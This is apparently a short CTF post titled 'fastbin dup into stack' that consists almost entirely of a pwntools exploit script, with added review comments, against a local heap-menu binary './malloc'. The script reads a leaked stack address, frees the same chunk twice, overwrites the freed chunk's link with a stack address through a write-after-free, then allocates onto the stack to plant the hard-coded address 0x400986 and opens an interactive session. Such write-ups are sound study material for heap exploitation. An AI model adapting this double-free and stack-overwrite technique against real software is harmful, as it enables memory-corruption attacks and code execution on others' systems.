
fastbin dup into stack으로 쓱싹!!!


from pwn import *

# Launch the challenge binary as a local child process; every helper below
# reads from and writes to this tube.
s = process("./malloc")
# Parsed ELF of the same binary.
# NOTE(review): `elf` is not referenced again in the visible script.
elf = ELF("./malloc")



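def malloc(size, content):
    """Drive menu option 1 of the target: send a size, then the data.

    Args:
        size: Value sent as decimal text at the "Enter size :" prompt.
        content: Data sent at the "Enter data : " prompt.

    What the target does with these values is not visible in this script;
    presumably option 1 allocates `size` bytes and stores `content` there
    (confirm against the binary).
    """
    # The first two statements had lost their indentation in the paste and
    # sat outside the function body; they are restored here.
    s.recvuntil("> ")
    s.sendline("1")
    s.recvuntil("Enter size :")
    s.sendline(str(size))
    s.recvuntil("Enter data : ")
    s.sendline(content)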


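def free(index):
    """Drive menu option 2 of the target: send the index to release.

    Args:
        index: Value sent as decimal text at the "free :" prompt.

    The script calls this twice on the same index, so the target evidently
    does not reject a repeated index at this prompt (confirm in the binary).
    """
    # The first two statements had lost their indentation in the paste and
    # sat outside the function body; they are restored here.
    s.recvuntil("> ")
    s.sendline("2")
    s.recvuntil("free :")
    s.sendline(str(index))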
    


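def list():
    """Select menu option 3 of the target.

    Only the menu choice is sent; whatever the target prints in response is
    left unread on the tube. The helper is not called anywhere in the
    visible script.

    NOTE(review): the name shadows the builtin `list` for the rest of the
    module; it is kept because callers may depend on it.
    """
    # Both statements had lost their indentation in the paste, leaving the
    # def without a body; they are restored here.
    s.recvuntil("> ")
    s.sendline("3")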

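def modify(index, content):
    """Drive menu option 4 of the target: pick an index, send new data.

    Args:
        index: Value sent as decimal text at the "modify : " prompt.
        content: Data sent at the "data : " prompt.

    The script uses this on an index it has already passed to free(), so
    the target evidently still accepts writes to a released slot (a
    write-after-free; confirm in the binary).
    """
    s.recvuntil("> ")
    # This statement had lost its indentation in the paste, which made the
    # following lines an IndentationError; it is restored here.
    s.sendline("4")
    s.recvuntil("modify : ")
    s.sendline(str(index))
    s.recvuntil("data : ")
    s.sendline(content)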
    

def quit():
    """Select menu option 5 of the target once the "> " prompt appears.

    NOTE(review): the name shadows the interactive `quit` helper; it is kept
    because callers may depend on it.
    """
    # sendlineafter waits for the delimiter and then sends the line, the same
    # recvuntil + sendline pair written as one call.
    s.sendlineafter("> ", "5")

# Debugging aid: attach gdb to the freshly started process before any input
# is sent.
gdb.attach(s)


# The target prints one of its own stack addresses at startup. 14 characters
# are read and parsed as hex (presumably "0x" plus 12 hex digits, confirm).
# NOTE(review): recv(14) returns *up to* 14 bytes, so a short read would make
# int() fail or parse a truncated address.
# NOTE(review): a program that discloses a stack address gives away what ASLR
# is meant to hide; this disclosure is what the rest of the script builds on.
s.recvuntil("Stack Address : ")
stack = int(s.recv(14),16)
print "stack : " + hex(stack)

# Two allocations of 32 bytes, then free index 1, index 2, and index 1 again.
# The same index is released twice with another release in between; this is
# the "fastbin dup" named in the post's heading (indexes presumably start at
# 1, confirm).
# NOTE(review): whether the repeated free is accepted depends on the
# allocator; newer glibc releases add double-free detection and pointer
# protection to the small-chunk free lists. The libc in use is not shown on
# the page.
malloc(32,"A"*8)
malloc(32,"B"*8)
free(1)
free(2)
free(1)

# Writes the packed 64-bit value stack-0x58 into index 1 *after* it was
# freed (write-after-free). Presumably this replaces the freed chunk's
# free-list link so that a later allocation is served from the stack; the
# 0x58 offset is specific to this binary and not explained on the page.
modify(1,p64(stack-0x58))
malloc(32,"C"*8)
# Second allocation after the write: 24 filler bytes followed by the packed
# constant 0x400986. The constant is hard-coded and its meaning is not
# stated; presumably an address inside ./malloc (TODO confirm). The size 49
# differs from the earlier 32 and is likewise unexplained.
malloc(49,"A"*24+p64(0x0000000000400986))
# Hand the tube over to the terminal for manual interaction.
s.interactive()

